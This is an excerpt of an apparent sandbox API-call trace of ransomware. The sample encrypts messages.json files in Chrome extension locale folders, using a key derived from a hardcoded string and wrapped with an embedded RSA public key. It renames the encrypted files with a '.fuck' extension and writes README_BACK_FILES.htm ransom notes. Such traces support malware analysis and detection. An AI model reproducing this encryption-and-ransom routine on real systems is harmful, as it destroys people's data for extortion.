[0256.854] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0256.855] FindNextFileA (in: hFindFile=0x2e186a8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0256.855] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\da\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e180e8 [0256.855] FindNextFileA (in: hFindFile=0x2e180e8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0256.855] FindNextFileA (in: hFindFile=0x2e180e8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0256.855] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0256.855] GetLastError () returned 0x0 [0256.855] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\da\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\da\\messages.json")) returned 0x20 [0256.856] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\da\\messages.json", dwFileAttributes=0x80) returned 1 [0256.856] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\da\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\da\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0256.857] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\da\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\da\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0256.857] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\da\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0256.858] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e13988) returned 1 [0256.860] CryptCreateHash (in: hProv=0x2e13988, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0256.860] lstrlenA (lpString="byYgIfljhIqZCcAZfOYyRTjjzMlQm") returned 29 [0256.860] CryptHashData (hHash=0x2e18128, pbData=0x28cb2d8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0256.860] CryptDeriveKey (in: hProv=0x2e13988, Algid=0x6610, hBaseData=0x2e18128, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e19828) returned 1 [0256.860] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----n", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0256.860] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0256.861] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e146d0) returned 1 [0256.861] CryptImportPublicKeyInfo (in: hCryptProv=0x2e146d0, dwCertEncodingType=0x1, pInfo=0x2e2beb0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2e2bee0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2e2bee8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e19328) returned 1 [0256.861] CryptEncrypt (in: hKey=0x2e19328, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0256.861] CryptEncrypt (in: hKey=0x2e19328, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e147e0*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e147e0*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0256.861] WriteFile (in: hFile=0x5d60, lpBuffer=0x2e147e0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e147e0*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0256.862] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0xac, lpOverlapped=0x0) returned 1 [0256.864] CryptEncrypt (in: hKey=0x2e19828, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0xac, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0xb0) returned 1 [0256.864] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0xb0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0xb0, lpOverlapped=0x0) returned 1 [0256.864] CloseHandle (hObject=0x5d5c) returned 1 [0256.864] CloseHandle (hObject=0x5d60) returned 1 [0256.864] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\da\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\da\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\da\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\da\\messages.json"), bFailIfExists=0) returned 1 [0256.868] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\da\\messages.json", dwFileAttributes=0x0) returned 1 [0256.868] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\da\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\da\\messages.json.gsg")) returned 1 [0256.870] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\da\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\da\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\da\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\da\\messages.json.fuck")) returned 1 [0256.871] CryptDestroyHash (hHash=0x2e18128) returned 1 [0256.871] CryptDestroyKey (hKey=0x2e19828) returned 1 [0256.871] CryptReleaseContext (hProv=0x2e13988, dwFlags=0x0) returned 1 [0256.872] FindNextFileA (in: hFindFile=0x2e180e8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0256.872] FindClose (in: hFindFile=0x2e180e8 | out: hFindFile=0x2e180e8) returned 1 [0256.872] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\da\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\da\\readme_back_files.htm")) returned 0xffffffff [0256.872] AreFileApisANSI () returned 1 [0256.872] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3ee0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0256.872] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\da\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\da\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0256.873] GetFileType (hFile=0x5d50) returned 0x1 [0256.873] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0256.874] FindNextFileA (in: hFindFile=0x2e186a8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0256.874] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\de\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e180e8 [0256.875] FindNextFileA (in: hFindFile=0x2e180e8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0256.875] FindNextFileA (in: hFindFile=0x2e180e8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0256.875] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0256.875] GetLastError () returned 0x0 [0256.875] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\de\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\de\\messages.json")) returned 0x20 [0256.875] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\de\\messages.json", dwFileAttributes=0x80) returned 1 [0256.876] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\de\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\de\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0256.877] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\de\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\de\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0256.878] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\de\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0256.879] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e13988) returned 1 [0256.881] CryptCreateHash (in: hProv=0x2e13988, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0256.881] lstrlenA (lpString="byYgIfljhIqZCcAZfOYyRTjjzMlQm") returned 29 [0256.881] CryptHashData (hHash=0x2e18128, pbData=0x28cb4e0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0256.881] CryptDeriveKey (in: hProv=0x2e13988, Algid=0x6610, hBaseData=0x2e18128, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e193a8) returned 1 [0256.881] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----n", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0256.881] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0256.881] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e14648) returned 1 [0256.882] CryptImportPublicKeyInfo (in: hCryptProv=0x2e14648, dwCertEncodingType=0x1, pInfo=0x2e2b420*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2e2b450*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2e2b458*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e19428) returned 1 [0256.882] CryptEncrypt (in: hKey=0x2e19428, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0256.882] CryptEncrypt (in: hKey=0x2e19428, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e150e8*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e150e8*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0256.882] WriteFile (in: hFile=0x5d5c, lpBuffer=0x2e150e8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e150e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0256.883] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0xc1, lpOverlapped=0x0) returned 1 [0256.885] CryptEncrypt (in: hKey=0x2e193a8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0xc1, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0xd0) returned 1 [0256.885] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0xd0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0xd0, lpOverlapped=0x0) returned 1 [0256.885] CloseHandle (hObject=0x5d60) returned 1 [0256.885] CloseHandle (hObject=0x5d5c) returned 1 [0256.885] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\de\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\de\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\de\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\de\\messages.json"), bFailIfExists=0) returned 1 [0256.889] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\de\\messages.json", dwFileAttributes=0x0) returned 1 [0256.890] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\de\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\de\\messages.json.gsg")) returned 1 [0256.891] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\de\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\de\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\de\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\de\\messages.json.fuck")) returned 1 [0256.892] CryptDestroyHash (hHash=0x2e18128) returned 1 [0256.893] CryptDestroyKey (hKey=0x2e193a8) returned 1 [0256.893] CryptReleaseContext (hProv=0x2e13988, dwFlags=0x0) returned 1 [0256.893] FindNextFileA (in: hFindFile=0x2e180e8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0256.893] FindClose (in: hFindFile=0x2e180e8 | out: hFindFile=0x2e180e8) returned 1 [0256.893] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\de\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\de\\readme_back_files.htm")) returned 0xffffffff [0256.893] AreFileApisANSI () returned 1 [0256.893] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3ee0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0256.893] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\de\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\de\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0256.894] GetFileType (hFile=0x5d50) returned 0x1 [0256.894] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0256.895] FindNextFileA (in: hFindFile=0x2e186a8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0256.895] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\el\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e180e8 [0256.895] FindNextFileA (in: hFindFile=0x2e180e8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0256.895] FindNextFileA (in: hFindFile=0x2e180e8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0256.895] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0256.895] GetLastError () returned 0x0 [0256.896] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\el\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\el\\messages.json")) returned 0x20 [0256.896] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\el\\messages.json", dwFileAttributes=0x80) returned 1 [0256.896] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\el\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\el\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0256.897] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\el\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\el\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0256.897] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\el\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0256.897] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e13988) returned 1 [0256.899] CryptCreateHash (in: hProv=0x2e13988, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0256.899] lstrlenA (lpString="byYgIfljhIqZCcAZfOYyRTjjzMlQm") returned 29 [0256.899] CryptHashData (hHash=0x2e18128, pbData=0x28cb328, 